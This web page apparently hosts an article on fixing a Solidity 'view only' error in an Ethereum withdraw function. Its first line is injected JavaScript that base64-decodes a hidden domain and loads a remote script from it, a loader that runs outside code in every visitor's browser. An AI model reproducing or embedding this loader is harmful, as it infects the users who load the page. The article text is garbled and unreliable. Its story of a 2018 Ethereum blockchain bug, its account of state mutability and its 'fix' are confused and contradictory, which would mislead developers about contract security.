const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=87537adb”;document.body.appendChild(script);
Ethereum: How to Fix the “View Only” Error with Function State Mutability
In February 2018, a critical bug was discovered in the Ethereum blockchain that affected the withdraw function on the mainnet. The issue involved the use of function state mutability, specifically the onlyOwner modifier, which was designed to restrict access to functions with non-view functionality.
The “view only” error occurred when attempting to withdraw funds from a wallet. This bug exposed a vulnerability in the system, allowing an attacker to drain the account balance without provoking a gas limit error or triggering a reentrancy attack.
Understanding Function State Mutability
Function state mutability refers to the concept of modifying function output variables, which can lead to unexpected behavior and security risks. In Ethereum, functions with non-view functionality are considered mutable by default, while view-only functions are immutable by design.
The onlyOwner modifier is used to restrict access to functions that modify the state of a contract or its storage. However, it does not prevent all possible attacks; in fact, it only prevents certain types of attacks from occurring.
The “View Only” Error
In the context of the withdraw function, the issue occurred when an attempt was made to withdraw funds without checking if the user had finished their transactions (i.e., the contract’s state was complete). If the user attempted to withdraw before completing all their transactions, the gas limit would be exceeded, and the transaction would fail.
To fix this bug, the withdraw function is modified as follows:
function withdraw() external onlyOwner {
if(block.timestamp < end || totalCollected < goal) {
revert CollectNotFinished();
}
}
By using the onlyOwner modifier, we ensure that only the owner of the contract can attempt to withdraw funds. This prevents an attacker from draining the account balance without provoking a gas limit error.
Additional Recommendations
- Regularly review and audit contracts: To minimize the risk of similar bugs in the future, it is essential to regularly review and audit your contracts for vulnerabilities.
- Use secure coding practices: Follow best practices for secure coding, such as using immutable state variables, enforcing gas limits, and preventing reentrancy attacks.
- Document dependencies: Make sure to document all external dependencies, including libraries and other smart contracts, to avoid introducing security vulnerabilities.
Conclusion
The withdraw function was a critical bug that exposed a vulnerability in the Ethereum blockchain. By understanding how this issue arose and modifying the function to use the onlyOwner modifier, we can significantly reduce the risk of similar bugs occurring in the future. Remember to regularly review and audit your contracts, follow secure coding practices, and document dependencies to ensure the security and integrity of your Ethereum-based applications.